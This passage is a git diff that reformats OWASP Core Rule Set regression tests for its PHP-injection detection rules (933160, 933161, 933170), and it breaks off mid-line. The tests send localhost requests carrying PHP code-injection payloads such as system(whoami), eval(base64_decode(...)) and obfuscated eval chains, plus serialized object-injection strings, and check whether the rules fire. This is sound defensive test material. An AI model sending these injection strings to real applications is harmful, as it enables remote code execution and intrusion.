text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%23%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%23%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 12 desc: | PHP function call with comment, newline, and vertical tab. payload: exec \t #\n () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 13 desc: | PHP function call with c-style comment syntax. payload: exec/*comment*/() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 14 desc: | PHP function call with c-style comment syntax and whitespaces. payload: exec /*comment*/ () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 15 desc: | PHP function call with empry c-style comment syntax, whitespaces, and vertical tab. - payload: exec \t/**/\t () - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-16 + payload: exec /**/ () + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 16 desc: | PHP function call with c-style comment syntax containing newline, whitespaces and vertical tab. payload: exec\t/*foo\r\nbar*/\t () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 17 desc: | PHP function call in URI payload: substr() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/substr()" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/substr()" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 18 desc: | PHP function call in URI, using mixed case payload: subSTR($x) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/subSTR%28%24x%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/subSTR%28%24x%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 19 desc: | PHP function call in URI with concatenated string/functions payload: eval(chr(112).chr(104).chr(112)) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 20 desc: | PHP function call in URI payload: eval(gzinflate(str_rot13(base64_decode("") stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 21 desc: | PHP function call in URI, base64 encoded payload: payload: /eval(base64_decode('cGFwYWRhcHVwaSwK') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 22 desc: | PHP function call in body payload: eval("echo 10000000000-245205634;") stages: - - stage: - input: - data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-23 + - input: + data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 23 desc: | PHP function call in body, mixed case payload: eVAl("echo 10000000000-245205634;") stages: - - stage: - input: - data: yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-24 + - input: + data: yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 24 desc: string function call stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=return%22system%22%28xyz%29.s" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=return%22system%22%28xyz%29.s" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 25 desc: | PHP function call payload: system(whoami) stages: - - stage: - input: - data: cmd=system(whoami) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-26 + - input: + data: cmd=system(whoami) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 26 desc: | PHP function call payload: (system)(whoami) stages: - - stage: - input: - data: cmd=(system)(whoami) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-27 + - input: + data: cmd=(system)(whoami) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 27 desc: | PHP function system call in single quotes and parentheses payload: ('system')('whoami') stages: - - stage: - input: - data: cmd=('system')('whoami') - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-28 + - input: + data: cmd=('system')('whoami') + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 28 desc: | PHP system call in double quotes and parentheses payload: ("system")("whoami") stages: - - stage: - input: - data: cmd=("system")("whoami") - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-29 + - input: + data: cmd=("system")("whoami") + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 29 desc: | PHP system call in double quotes and parentheses, multiple spaces after command payload: ("system ")("whoami") stages: - - stage: - input: - data: cmd=("system ")("whoami") - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-30 + - input: + data: cmd=("system ")("whoami") + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 30 desc: | PHP string function call payload: return"system"(xyz).s stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=return%22system%22%28xyz%29.s" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=return%22system%22%28xyz%29.s" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 31 desc: | False Positive test, missing mandatory parenthesis payload: /eval( stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/eval(" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/eval(" + version: "HTTP/1.1" + output: + no_log_contains: id "933160" + - test_id: 32 desc: | False Positive test, missing mandatory parenthesis payload: eval stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=eval" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=eval" + version: "HTTP/1.1" + output: + no_log_contains: id "933160" + - test_id: 33 desc: | False Positive test payload: the files (yep) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20files%20%28yep%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20files%20%28yep%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933160" + - test_id: 34 desc: | PHP mixed case function call with space, LF between (). payload: assert_OptionS (\n\n) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 35 desc: | PHP function call `filegroup` with multiple whitespaces. payload: filegroup (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=filegroup%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=filegroup%20%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 36 desc: | PHP function call in URI payload: unpack() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/unpack()" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/unpack()" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 37 desc: | PHP function call in URI, using mixed case payload: unPACK($x) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unPACK%28%24x%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unPACK%28%24x%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml index 8c12ac72f..f59a24858 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml @@ -2,92 +2,85 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 933161.yaml tests: - - test_title: 933161-1 + - test_id: 1 desc: regexp; must run test in PL3! stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20checkDate%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" - - test_title: 933161-2 + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20checkDate%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933161" + - test_id: 2 desc: regexp; must run test in PL3! stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=chroot%09%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" - - test_title: 933161-3 + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=chroot%09%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933161" + - test_id: 3 desc: symlink \t() stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=symlink%09%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=symlink%09%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933161" # See https://github.com/coreruleset/coreruleset/pull/3273#issuecomment-1675490075 - # - test_title: 933161-4 + # - test_id: 4 # desc: dl/*foo*/() # stages: - # - stage: - # input: - # data: gethostbynamE( - # dest_addr: 127.0.0.1 - # headers: - # Host: localhost - # User-Agent: "OWASP CRS test agent" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # method: POST - # port: 80 - # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" - # version: "HTTP/1.1" - # output: - # log_contains: id "933161" - - test_title: 933161-5 + # - input: + # data: gethostbynamE( + # dest_addr: 127.0.0.1 + # headers: + # Host: localhost + # User-Agent: "OWASP CRS test agent" + # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # method: POST + # port: 80 + # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" + # version: "HTTP/1.1" + # output: + # log_contains: id "933161" + - test_id: 5 desc: ucfirst() stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=xucfirst%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933161" + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=xucfirst%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933161" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index 9dd5a73be..499134b90 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml @@ -2,174 +2,162 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 933170.yaml tests: - - test_title: 933170-1 + - test_id: 1 desc: PHP object injection stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 2 desc: PHP object injection stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" + version: "HTTP/1.1" + output: + log_contains: id "933170" + - test_id: 3 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize2" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-4 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize2" + version: "HTTP/1.1" + output: + log_contains: id 